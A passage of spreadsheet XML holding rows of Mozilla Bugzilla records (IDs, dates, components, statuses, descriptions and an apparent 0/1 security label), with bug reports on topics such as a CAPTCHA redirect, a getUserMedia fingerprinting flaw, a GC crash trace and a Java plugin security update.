      <c r="R3953" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3953" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3953" t="n">
        <v>1</v>
      </c>
      <c r="U3953" t="n">
        <v>0</v>
      </c>
      <c r="V3953" t="n">
        <v>5</v>
      </c>
      <c r="W3953" t="inlineStr">
        <is>
          <t>Time to get 1.8 staging running again after finishing with the Thunderbird test (bug 427769). I think we should refresh the mirror and start building Fx 2.0.0.15 - there could be regressions from bug 428063.</t>
        </is>
      </c>
      <c r="X3953" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3954">
      <c r="A3954" t="n">
        <v>680332</v>
      </c>
      <c r="B3954" t="inlineStr">
        <is>
          <t>2011-08-18 21:14:14 -0700</t>
        </is>
      </c>
      <c r="C3954" t="inlineStr">
        <is>
          <t>Entering incorrect Captcha redirects to blank page</t>
        </is>
      </c>
      <c r="D3954" t="inlineStr">
        <is>
          <t>2012-03-05 09:53:16 -0800</t>
        </is>
      </c>
      <c r="E3954" t="n">
        <v>1</v>
      </c>
      <c r="F3954" t="n">
        <v>1</v>
      </c>
      <c r="G3954" t="n">
        <v>5</v>
      </c>
      <c r="H3954" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3954" t="inlineStr">
        <is>
          <t>quality.mozilla.org</t>
        </is>
      </c>
      <c r="J3954" t="inlineStr">
        <is>
          <t>Website</t>
        </is>
      </c>
      <c r="K3954" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3954" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3954" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3954" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3954" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3954" t="inlineStr"/>
      <c r="Q3954" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3954" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3954" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3954" t="n">
        <v>1</v>
      </c>
      <c r="U3954" t="n">
        <v>0</v>
      </c>
      <c r="V3954" t="n">
        <v>3</v>
      </c>
      <c r="W3954" t="inlineStr">
        <is>
          <t>When you're signing up for QMO and enter the incorrect CAPTCHA you're redirected to a blank page with the URL of http://quality.mozilla.org/register.</t>
        </is>
      </c>
      <c r="X3954" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3955">
      <c r="A3955" t="n">
        <v>1565374</v>
      </c>
      <c r="B3955" t="inlineStr">
        <is>
          <t>2019-07-11 14:21:22 -0700</t>
        </is>
      </c>
      <c r="C3955" t="inlineStr">
        <is>
          <t>Fingerprinting resistance against getUserMedia constraints doesn't work</t>
        </is>
      </c>
      <c r="D3955" t="inlineStr">
        <is>
          <t>2020-06-05 00:22:29 -0700</t>
        </is>
      </c>
      <c r="E3955" t="n">
        <v>1</v>
      </c>
      <c r="F3955" t="n">
        <v>1</v>
      </c>
      <c r="G3955" t="n">
        <v>3</v>
      </c>
      <c r="H3955" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3955" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3955" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K3955" t="inlineStr">
        <is>
          <t>69 Branch</t>
        </is>
      </c>
      <c r="L3955" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3955" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3955" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3955" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3955" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main69+][adv-esr68.1+]</t>
        </is>
      </c>
      <c r="Q3955" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3955" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3955" t="inlineStr">
        <is>
          <t>mozilla70</t>
        </is>
      </c>
      <c r="T3955" t="n">
        <v>1</v>
      </c>
      <c r="U3955" t="n">
        <v>0</v>
      </c>
      <c r="V3955" t="n">
        <v>15</v>
      </c>
      <c r="W3955" t="inlineStr">
        <is>
          <t>Found through bug 1565317 really, which was caused by bug 1560907.
Prior to bug 1560907 code for reducing a set of constraints looked [like this](https://searchfox.org/mozilla-central/rev/15be167a5b436b57fef944b84eef061d24c1af8c/dom/media/MediaManager.cpp#2286-2295):
```
  // It looks like {audio: true}, do nothing.
  if (!aConstraint.IsMediaTrackConstraints()) {
    return;
  }
  // Keep mediaSource, ignore all other constraints.
  auto&amp; c = aConstraint.GetAsMediaTrackConstraints();
  MOZ_DIAGNOSTIC_ASSERT(c.mMediaSource.WasPassed());
  nsString mediaSource = c.mMediaSource.Value();
  aConstraint.SetAsMediaTrackConstraints().mMediaSource.Construct(mediaSource);
```
But since `aConstraint` is already a `MediaTrackConstraints`, `SetAsMediaTrackConstraints()` [does not Uninit and reset its values](https://searchfox.org/mozilla-central/source/__GENERATED__/dom/bindings/MediaStreamBinding.cpp#124). The reduction is basically a no-op.</t>
        </is>
      </c>
      <c r="X3955" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3956">
      <c r="A3956" t="n">
        <v>1023035</v>
      </c>
      <c r="B3956" t="inlineStr">
        <is>
          <t>2014-06-09 20:14:36 -0700</t>
        </is>
      </c>
      <c r="C3956" t="inlineStr">
        <is>
          <t>Assertion failure: CurrentThreadCanAccessRuntime(rt), at /js/src/jsgc.cpp:2141</t>
        </is>
      </c>
      <c r="D3956" t="inlineStr">
        <is>
          <t>2014-10-31 13:52:37 -0700</t>
        </is>
      </c>
      <c r="E3956" t="n">
        <v>1</v>
      </c>
      <c r="F3956" t="n">
        <v>1</v>
      </c>
      <c r="G3956" t="n">
        <v>3</v>
      </c>
      <c r="H3956" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3956" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3956" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K3956" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3956" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3956" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3956" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3956" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3956" t="inlineStr">
        <is>
          <t>[adv-main33+]</t>
        </is>
      </c>
      <c r="Q3956" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3956" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3956" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T3956" t="n">
        <v>1</v>
      </c>
      <c r="U3956" t="n">
        <v>0</v>
      </c>
      <c r="V3956" t="n">
        <v>7</v>
      </c>
      <c r="W3956" t="inlineStr">
        <is>
          <t>Encounter this while executing mochitest on b2g-desktop debug build.
https://tbpl.mozilla.org/php/getParsedLog.php?id=41355834&amp;tree=Try&amp;full=1#error2
06:54:12     INFO -   0  libxul.so!js::gc::GCRuntime::triggerGC(JS::gcreason::Reason) [jsgc.cpp:7e27d78d3629 : 2141 + 0x18]
06:54:12     INFO -      eip = 0xb55fed91   esp = 0xb11cf1b0   ebp = 0xb11cf1d8   ebx = 0xb6bd4ca4
06:54:12     INFO -      esi = 0x00000000   edi = 0xafec71c0   eax = 0x00000000   ecx = 0xb759d8ac
06:54:12     INFO -      edx = 0x00000000   efl = 0x00210282
06:54:12     INFO -      Found by: given as instruction pointer in context
06:54:12     INFO -   1  libxul.so!js::gc::GCRuntime::onTooMuchMalloc() [jsgc.cpp:7e27d78d3629 : 1514 + 0xc]
06:54:12     INFO -      eip = 0xb56075ca   esp = 0xb11cf1e0   ebp = 0xb11cf1f8   ebx = 0xb6bd4ca4
06:54:12     INFO -      esi = 0xafec7c60   edi = 0x0004d316
06:54:12     INFO -      Found by: call frame info
06:54:12     INFO -   2  libxul.so!js::ScriptSource::ensureOwnsSource(js::ExclusiveContext*) [jscntxt.h:7e27d78d3629 : 274 + 0x14]
06:54:12     INFO -      eip = 0xb56b9c22   esp = 0xb11cf200   ebp = 0xb11cf238   ebx = 0xb6bd4ca4
06:54:12     INFO -      esi = 0x9c4693a0   edi = 0x0004d316
06:54:12     INFO -      Found by: call frame info
06:54:12     INFO -   3  libxul.so!js::frontend::CompileScript(js::ExclusiveContext*, js::LifoAlloc*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSScript*&gt;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, JSString*, unsigned int, js::SourceCompressionTask*) [BytecodeCompiler.cpp:7e27d78d3629 : 256 + 0x30]
06:54:12     INFO -      eip = 0xb5884181   esp = 0xb11cf240   ebp = 0xb11d0228   ebx = 0xb6bd4ca4
06:54:12     INFO -      esi = 0x9c4693a0   edi = 0xa72c3a00
06:54:12     INFO -      Found by: call frame info
06:54:12     INFO -   4  libxul.so!js::HelperThread::handleParseWorkload() [HelperThreads.cpp:7e27d78d3629 : 907 + 0x41]
06:54:12     INFO -      eip = 0xb5759d68   esp = 0xb11d0230   ebp = 0xb11d0298   ebx = 0xb6bd4ca4
06:54:12     INFO -      esi = 0xb71b9540   edi = 0x9cbf9200
06:54:12     INFO -      Found by: call frame info
06:54:12     INFO -   5  libxul.so!js::HelperThread::threadLoop() [HelperThreads.cpp:7e27d78d3629 : 1089 + 0xa]
06:54:12     INFO -      eip = 0xb575a300   esp = 0xb11d02a0   ebp = 0xb11d02e8   ebx = 0xb6bd4ca4
06:54:12     INFO -      esi = 0xb105be00   edi = 0x00000000
06:54:12     INFO -      Found by: call frame info</t>
        </is>
      </c>
      <c r="X3956" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3957">
      <c r="A3957" t="n">
        <v>1142770</v>
      </c>
      <c r="B3957" t="inlineStr">
        <is>
          <t>2015-03-12 15:34:06 -0700</t>
        </is>
      </c>
      <c r="C3957" t="inlineStr">
        <is>
          <t>Dialer, messaging and settings app not working</t>
        </is>
      </c>
      <c r="D3957" t="inlineStr">
        <is>
          <t>2015-04-03 12:51:04 -0700</t>
        </is>
      </c>
      <c r="E3957" t="n">
        <v>1</v>
      </c>
      <c r="F3957" t="n">
        <v>1</v>
      </c>
      <c r="G3957" t="n">
        <v>6</v>
      </c>
      <c r="H3957" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3957" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J3957" t="inlineStr">
        <is>
          <t>RIL</t>
        </is>
      </c>
      <c r="K3957" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3957" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M3957" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N3957" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3957" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3957" t="inlineStr">
        <is>
          <t>[caf priority: p1][CR 807538]</t>
        </is>
      </c>
      <c r="Q3957" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3957" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3957" t="inlineStr">
        <is>
          <t>2.2 S9 (3apr)</t>
        </is>
      </c>
      <c r="T3957" t="n">
        <v>1</v>
      </c>
      <c r="U3957" t="n">
        <v>0</v>
      </c>
      <c r="V3957" t="n">
        <v>40</v>
      </c>
      <c r="W3957" t="inlineStr">
        <is>
          <t>Dialer throws the following exception when attempting to dial a call
Communications( 3557): [JavaScript Error: "ReferenceError: MmiManager is not defined" {file: "app://communications.gaiamobile.org/dialer/gaia_build_defer_index.js" line: 151}]
Similar error are coming from settings app when I try to open say a Call Settings.
Settings( 3702): [JavaScript Error: "TypeError: s[0] is undefined" {file: "app://settings.gaiamobile.org/js/telephony_items_handler.js" line: 1}]</t>
        </is>
      </c>
      <c r="X3957" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3958">
      <c r="A3958" t="n">
        <v>877224</v>
      </c>
      <c r="B3958" t="inlineStr">
        <is>
          <t>2013-05-29 09:34:37 -0700</t>
        </is>
      </c>
      <c r="C3958" t="inlineStr">
        <is>
          <t>Periodically cleanup files on update.boot2gecko.org</t>
        </is>
      </c>
      <c r="D3958" t="inlineStr">
        <is>
          <t>2020-01-10 08:23:56 -0800</t>
        </is>
      </c>
      <c r="E3958" t="n">
        <v>1</v>
      </c>
      <c r="F3958" t="n">
        <v>1</v>
      </c>
      <c r="G3958" t="n">
        <v>6</v>
      </c>
      <c r="H3958" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3958" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations Graveyard</t>
        </is>
      </c>
      <c r="J3958" t="inlineStr">
        <is>
          <t>CIDuty</t>
        </is>
      </c>
      <c r="K3958" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3958" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3958" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3958" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3958" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3958" t="inlineStr"/>
      <c r="Q3958" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3958" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3958" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3958" t="n">
        <v>1</v>
      </c>
      <c r="U3958" t="n">
        <v>0</v>
      </c>
      <c r="V3958" t="n">
        <v>13</v>
      </c>
      <c r="W3958" t="inlineStr">
        <is>
          <t>We need more disk space for unagi builds as we keep hitting out of disk space issues when promoting a build to dogfooders.
Current space allocated to /data is 32GB with 24KB free.
This is blocking the latest promotion to dogfooders.</t>
        </is>
      </c>
      <c r="X3958" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3959">
      <c r="A3959" t="n">
        <v>892514</v>
      </c>
      <c r="B3959" t="inlineStr">
        <is>
          <t>2013-07-11 08:08:00 -0700</t>
        </is>
      </c>
      <c r="C3959" t="inlineStr">
        <is>
          <t>UI to Add Pre-recorded Events to Air Mozilla</t>
        </is>
      </c>
      <c r="D3959" t="inlineStr">
        <is>
          <t>2021-09-21 05:19:16 -0700</t>
        </is>
      </c>
      <c r="E3959" t="n">
        <v>1</v>
      </c>
      <c r="F3959" t="n">
        <v>1</v>
      </c>
      <c r="G3959" t="n">
        <v>6</v>
      </c>
      <c r="H3959" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3959" t="inlineStr">
        <is>
          <t>Webtools Graveyard</t>
        </is>
      </c>
      <c r="J3959" t="inlineStr">
        <is>
          <t>Air Mozilla</t>
        </is>
      </c>
      <c r="K3959" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3959" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3959" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3959" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3959" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3959" t="inlineStr">
        <is>
          <t>cm3</t>
        </is>
      </c>
      <c r="Q3959" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3959" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3959" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3959" t="n">
        <v>1</v>
      </c>
      <c r="U3959" t="n">
        <v>0</v>
      </c>
      <c r="V3959" t="n">
        <v>11</v>
      </c>
      <c r="W3959" t="inlineStr">
        <is>
          <t>Neither the current Suggestion wizard nor the old event entry form are good fits for someone wanting to add a pre-recorded event to the Air Mozilla archive.
We need a dedicated UI for this.</t>
        </is>
      </c>
      <c r="X3959" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3960">
      <c r="A3960" t="n">
        <v>644682</v>
      </c>
      <c r="B3960" t="inlineStr">
        <is>
          <t>2011-03-24 10:56:37 -0700</t>
        </is>
      </c>
      <c r="C3960" t="inlineStr">
        <is>
          <t>New version of JEP (0.9.7.5), please land on branches</t>
        </is>
      </c>
      <c r="D3960" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E3960" t="n">
        <v>1</v>
      </c>
      <c r="F3960" t="n">
        <v>1</v>
      </c>
      <c r="G3960" t="n">
        <v>6</v>
      </c>
      <c r="H3960" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3960" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J3960" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K3960" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L3960" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3960" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3960" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3960" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3960" t="inlineStr">
        <is>
          <t>[sg:critical] fixes critical bug 634724</t>
        </is>
      </c>
      <c r="Q3960" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3960" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3960" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3960" t="n">
        <v>1</v>
      </c>
      <c r="U3960" t="n">
        <v>0</v>
      </c>
      <c r="V3960" t="n">
        <v>13</v>
      </c>
      <c r="W3960" t="inlineStr">
        <is>
          <t>JEP 0.9.7.5 fixes a major security hole (bug 634724), and also works
around some breakage caused by Apple's latest Java updates (Update 4
for OS X 10.6 and Update 9 for OS X 10.5).  One of these
Apple-triggered problems is itself a major bug -- as of Apple's latest
updates, older versions of the JEP now leak all Java applets (they
don't get destroyed when the plugin is unloaded).
Because I don't want to reveal too much about the security bug before
it's been fixed in all current Mozilla releases, I haven't yet
formally released JEP 0.9.7.5 (I haven't yet uploaded it to
http://javaplugin.sourceforge.net/).  That's also why I've marked this
bug security sensitive.
I'll email copies of the JEP 0.9.7.5 distro to Josh (who I'm going to
ask to review), and to anyone else who wants one.  It's about 4MB.
JEP 0.9.7.5 needs to be landed on the current branches today, to make
the code freeze for FF 3.6.17 and 3.5.19.  Sorry I've cut it so close,
but I had little choice.  Fixing bug 634724 took much longer than
expected, and I also didn't expect to have to deal with Apple's
breakage.
It should probably also be landed on the 1.9.0 branch, so Camino can
pick it up.
Those who want to try the new version right away will need to install
it "over" the older versions currently bundled with Mozilla.org
browsers.  I recommend doing the following.  Note that these
instructions have changed from what I used to recommend.  This is
because Apple made changes in their most recent Java Updates (on OS X
10.5.X and 10.6.X) that cause the previous instructions to no longer
work properly.
For each of the browser binaries you wish to update:
1) Control-click (or right-click) on the browser binary and choose
   "Show Package Contents".
2) Browse to the Contents/MacOS/plugins folder and delete
   JavaEmbeddingPlugin.bundle and MRJPlugin.plugin.
3) Drag copies of the new Java Embedding Plugin binaries to the
   Contents/MacOS/plugins folder.</t>
        </is>
      </c>
      <c r="X3960" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3961">
      <c r="A3961" t="n">
        <v>1235876</v>
      </c>
      <c r="B3961" t="inlineStr">
        <is>
          <t>2015-12-30 11:41:17 -0800</t>
        </is>
      </c>
      <c r="C3961" t="inlineStr">
        <is>
          <t>LWT permissions exposed to man-in-the-middle attacks</t>
        </is>
      </c>
      <c r="D3961" t="inlineStr">
        <is>
          <t>2020-12-21 10:38:46 -0800</t>
        </is>
      </c>
      <c r="E3961" t="n">
        <v>1</v>
      </c>
      <c r="F3961" t="n">
        <v>1</v>
      </c>
      <c r="G3961" t="n">
        <v>6</v>
      </c>
      <c r="H3961" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3961" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J3961" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3961" t="inlineStr">
        <is>
          <t>35 Branch</t>
        </is>
      </c>
      <c r="L3961" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3961" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3961" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3961" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3961" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main44+]</t>
        </is>
      </c>
      <c r="Q3961" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3961" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3961" t="inlineStr">
        <is>
          <t>Firefox 46</t>
        </is>
      </c>
      <c r="T3961" t="n">
        <v>1</v>
      </c>
      <c r="U3961" t="n">
        <v>0</v>
      </c>
      <c r="V3961" t="n">
        <v>11</v>
      </c>
      <c r="W3961" t="inlineStr">
        <is>
          <t>To install a lightweight theme, we listen for custom events from addons.mozilla.org, and we check the document URI to make sure these events are actually coming from addons.mozilla.org:
https://dxr.mozilla.org/mozilla-central/rev/9ddf0da90fb3bc1ae29966dc596013fc54a44bd2/mobile/android/chrome/content/browser.js#3251-3259
However, we don't check the scheme to ensure it's https. We should do that. Desktop already does this:
https://dxr.mozilla.org/mozilla-central/rev/9ddf0da90fb3bc1ae29966dc596013fc54a44bd2/browser/base/content/browser-addons.js#631-647
To fix this bug, make the mobile code do what the desktop code does.</t>
        </is>
      </c>
      <c r="X3961" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3962">
      <c r="A3962" t="n">
        <v>1451415</v>
      </c>
      <c r="B3962" t="inlineStr">
        <is>
          <t>2018-04-04 10:28:15 -0700</t>
        </is>
      </c>
      <c r="C3962" t="inlineStr">
        <is>
          <t>remove /status/revision/ endpoint</t>
        </is>
      </c>
      <c r="D3962" t="inlineStr">
        <is>
          <t>2018-06-06 04:24:33 -0700</t>
        </is>
      </c>
      <c r="E3962" t="n">
        <v>1</v>
      </c>
      <c r="F3962" t="n">
        <v>1</v>
      </c>
      <c r="G3962" t="n">
        <v>4</v>
      </c>
      <c r="H3962" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3962" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3962" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K3962" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3962" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3962" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3962" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3962" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3962" t="inlineStr">
        <is>
          <t>[good first bug]</t>
        </is>
      </c>
      <c r="Q3962" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3962" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3962" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3962" t="n">
        <v>1</v>
      </c>
      <c r="U3962" t="n">
        <v>0</v>
      </c>
      <c r="V3962" t="n">
        <v>9</v>
      </c>
      <c r="W3962" t="inlineStr">
        <is>
          <t>In new stage, we're seeing an IOError when hitting the /status/revision/ endpoint (https://sentry.prod.mozaws.net/operations/socorro-new-stage/issues/712538/):
```
IOError: [Errno 2] No such file or directory: './socorro/socorro_revision.txt'
  File "django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "crashstats/crashstats/views.py", line 1014, in status_revision
    models.Status().get()['socorro_revision'],
  File "crashstats/crashstats/models.py", line 340, in get
    return self._get(expect_json=expect_json, **kwargs)
  File "crashstats/crashstats/models.py", line 398, in _get
    expect_json=expect_json,
  File "crashstats/crashstats/models.py", line 181, in inner
    result = method(*args, **kwargs)
  File "crashstats/crashstats/models.py", line 271, in fetch
    result = implementation_method(**params)
  File "socorro/external/postgresql/server_status.py", line 49, in get
    socorro_revision = get_file('socorro_revision.txt')
  File "socorro/external/postgresql/server_status.py", line 24, in get_file
    return resource_string('socorro', fn)
  File "pkg_resources/__init__.py", line 1149, in resource_string
    self, resource_name
  File "pkg_resources/__init__.py", line 1393, in get_resource_string
    return self._get(self._fn(self.module_path, resource_name))
  File "pkg_resources/__init__.py", line 1516, in _get
    with open(path, 'rb') as stream:
```
I'm not sure if this is a new-infra issue or an issue with the 313 deploy (bug 1451323).</t>
        </is>
      </c>
      <c r="X3962" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3963">
      <c r="A3963" t="n">
        <v>912643</v>
      </c>
      <c r="B3963" t="inlineStr">
        <is>
          <t>2013-09-04 12:11:52 -0700</t>
        </is>
      </c>
      <c r="C3963" t="inlineStr">
        <is>
          <t>Security advisory for Bugzilla 4.4.1, 4.2.7 and 4.0.11</t>
        </is>
      </c>
      <c r="D3963" t="inlineStr">
        <is>
          <t>2013-10-17 07:57:34 -0700</t>
        </is>
      </c>
      <c r="E3963" t="n">
        <v>1</v>
      </c>
      <c r="F3963" t="n">
        <v>1</v>
      </c>
      <c r="G3963" t="n">
        <v>4</v>
      </c>
      <c r="H3963" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3963" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3963" t="inlineStr">
        <is>
          <t>bugzilla.org</t>
        </is>
      </c>
      <c r="K3963" t="inlineStr">
        <is>
          <t>4.4</t>
        </is>
      </c>
      <c r="L3963" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3963" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3963" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3963" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3963" t="inlineStr"/>
      <c r="Q3963" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3963" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3963" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3963" t="n">
        <v>1</v>
      </c>
      <c r="U3963" t="n">
        <v>0</v>
      </c>
      <c r="V3963" t="n">
        <v>7</v>
      </c>
      <c r="W3963" t="inlineStr">
        <is>
          <t>Security bug 911593 affects 4.4 only (and trunk).</t>
        </is>
      </c>
      <c r="X3963" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3964">
      <c r="A3964" t="n">
        <v>527935</v>
      </c>
      <c r="B3964" t="inlineStr">
        <is>
          <t>2009-11-11 09:02:34 -0800</t>
        </is>
      </c>
      <c r="C3964" t="inlineStr">
        <is>
          <t>Untrusted events should not trigger autocomplete popup</t>
        </is>
      </c>
      <c r="D3964" t="inlineStr">
        <is>
          <t>2011-05-04 19:19:26 -0700</t>
        </is>
      </c>
      <c r="E3964" t="n">
        <v>1</v>
      </c>
      <c r="F3964" t="n">
        <v>1</v>
      </c>
      <c r="G3964" t="n">
        <v>3</v>
      </c>
      <c r="H3964" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3964" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3964" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K3964" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3964" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3964" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3964" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3964" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3964" t="inlineStr">
        <is>
